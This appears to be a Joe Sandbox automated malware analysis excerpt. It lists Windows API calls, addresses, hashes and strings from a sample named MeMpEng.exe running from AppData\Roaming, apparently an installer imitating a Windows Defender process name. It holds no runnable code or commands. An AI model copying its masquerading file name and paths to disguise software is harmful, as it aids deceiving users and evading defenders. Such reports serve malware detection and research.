                                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,004042CC), ref: 004044FF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                                          • Instruction ID: b0a400b6fcb01754b069d8f8c1c9044561b78d1e04efb9d0fff21555a903a89e
                                                          • Opcode Fuzzy Hash: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                                          • Instruction Fuzzy Hash: DFA00176444910ABDA02AB50EF0984ABB62FBE5701B519879A286510348B365820FB19
                                                          APIs
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                            • Part of subcall function 004055D9: lstrcatW.KERNEL32 ref: 00405634
                                                            • Part of subcall function 004055D9: SetWindowTextW.USER32 ref: 00405646
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                            • Part of subcall function 00405B37: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                                            • Part of subcall function 00405B37: CloseHandle.KERNEL32(?), ref: 00405B6D
                                                          • CloseHandle.KERNEL32(?), ref: 00402010
                                                            • Part of subcall function 004069F3: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401FC4,?,?,?,?,?,?), ref: 00406A04
                                                            • Part of subcall function 004069F3: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A26
                                                            • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
                                                          • Instruction ID: 31278e7032d6d459f1869afa1fc16bf8b986fef5f9539014001fbe5517bff4f7
                                                          • Opcode Fuzzy Hash: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
                                                          • Instruction Fuzzy Hash: 83F09672905511DBDB20BBA59A8999E7664DF0031CF21413FF202B25D5CABC4E41EA6E
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: b83d77026a0eef837aee2cf9f67490139d75f0ecd08a9ee5abe0a22eb8051c76
                                                          • Instruction ID: e3f6ed4717897a2e6ecee164b05e04455bfe3191319e132c95f7d07364d35911
                                                          • Opcode Fuzzy Hash: b83d77026a0eef837aee2cf9f67490139d75f0ecd08a9ee5abe0a22eb8051c76
                                                          • Instruction Fuzzy Hash: 48D0A773A146008BD744EBB8BE8546F73E8FB903193204C3BD102E10E1E67CC911461C
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404A13
                                                          • SetWindowTextW.USER32 ref: 00404A3D
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404AEE
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404AF9
                                                          • lstrcmpiW.KERNEL32(Call,007A1748,00000000,?,?), ref: 00404B2B
                                                          • lstrcatW.KERNEL32 ref: 00404B37
                                                          • SetDlgItemTextW.USER32 ref: 00404B49
                                                            • Part of subcall function 00405B98: GetDlgItemTextW.USER32 ref: 00405BAB
                                                            • Part of subcall function 00406802: CharNextW.USER32(?), ref: 00406865
                                                            • Part of subcall function 00406802: CharNextW.USER32(?), ref: 00406874
                                                            • Part of subcall function 00406802: CharNextW.USER32(?), ref: 00406879
                                                            • Part of subcall function 00406802: CharPrevW.USER32(?,?), ref: 0040688C
                                                          • GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,?,00000001,0079F718,?,?,000003FB,?), ref: 00404C0C
                                                          • MulDiv.KERNEL32 ref: 00404C27
                                                            • Part of subcall function 00404D80: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E21
                                                            • Part of subcall function 00404D80: wsprintfW.USER32 ref: 00404E2A
                                                            • Part of subcall function 00404D80: SetDlgItemTextW.USER32 ref: 00404E3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call
                                                          • API String ID: 2624150263-1755421812
                                                          • Opcode ID: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
                                                          • Instruction ID: db18d61dd8e36d4389a3b44505c0f864e6ca322f8728bcf89e652d7f1c678b9a
                                                          • Opcode Fuzzy Hash: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
                                                          • Instruction Fuzzy Hash: 25A185B1900208ABDB11AFA5DD45BEFB7B8EF84314F11403BF611B62D1D77C9A418B69
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F58
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F63
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FAD
                                                          • LoadImageW.USER32 ref: 00404FC4
                                                          • SetWindowLongW.USER32 ref: 00404FDD
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF1
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405003
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00405019
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405025
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405037
                                                          • DeleteObject.GDI32(00000000), ref: 0040503A
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405065
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405071
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510C
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513C
                                                            • Part of subcall function 00404508: SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405150
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040517E
                                                          • SetWindowLongW.USER32 ref: 0040518C
                                                          • ShowWindow.USER32(?,00000005), ref: 0040519C
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405297
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FC
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405311
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405335
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405355
                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040536A
                                                          • GlobalFree.KERNEL32(?), ref: 0040537A
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F3
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040549C
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AB
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D6
                                                          • ShowWindow.USER32(?,00000000), ref: 00405524
                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040552F
                                                          • ShowWindow.USER32(00000000), ref: 00405536
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
                                                          • Instruction ID: 3f60975f1bbea04172c566a814ac76c3bf8fe72ba7ce1bc18d7d222ec834a39f
                                                          • Opcode Fuzzy Hash: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
                                                          • Instruction Fuzzy Hash: B2027870900609AFDF20DF65DC85AAF7BB5FB85314F10816AFA10BA2E1D7798A41CF58
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404730
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404744
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404761
                                                          • GetSysColor.USER32 ref: 00404772
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404780
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040478E
                                                          • lstrlenW.KERNEL32(?), ref: 00404793
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A0
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B5
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040480E
                                                          • SendMessageW.USER32(00000000), ref: 00404815
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404840
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404883
                                                          • LoadCursorW.USER32 ref: 00404891
                                                          • SetCursor.USER32(00000000), ref: 00404894
                                                          • LoadCursorW.USER32 ref: 004048AD
                                                          • SetCursor.USER32(00000000), ref: 004048B0
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048DF
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: F@$Call$N
                                                          • API String ID: 3103080414-3713480610
                                                          • Opcode ID: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
                                                          • Instruction ID: 45fb83ade45cfc86163e6b15eb7062ba83955ff26de70ff6e3d1e782862a206c
                                                          • Opcode Fuzzy Hash: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
                                                          • Instruction Fuzzy Hash: 1861A2B1900209BFDF10AF60DD85A6A7B69FB85314F00843AF705B62E0C778AD51CFA9
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000), ref: 004061D5
                                                          • GetShortPathNameW.KERNEL32 ref: 004061DE
                                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
                                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB
                                                          • GetShortPathNameW.KERNEL32 ref: 004061FB
                                                          • wsprintfA.USER32 ref: 00406219
                                                          • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406254
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406263
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629B
                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406302
                                                          • CloseHandle.KERNEL32(00000000), ref: 00406309
                                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 00406048
                                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
                                                          • API String ID: 2171350718-3350566011
                                                          • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                          • Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
                                                          • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                          • Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                                          • Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
                                                          • Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                                          • Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4
                                                          APIs
                                                          Strings
                                                          • *?|<>/":, xrefs: 00406854
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406803
                                                          • "C:\Users\user\AppData\Roaming\MeMpEng.exe" , xrefs: 00406846
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
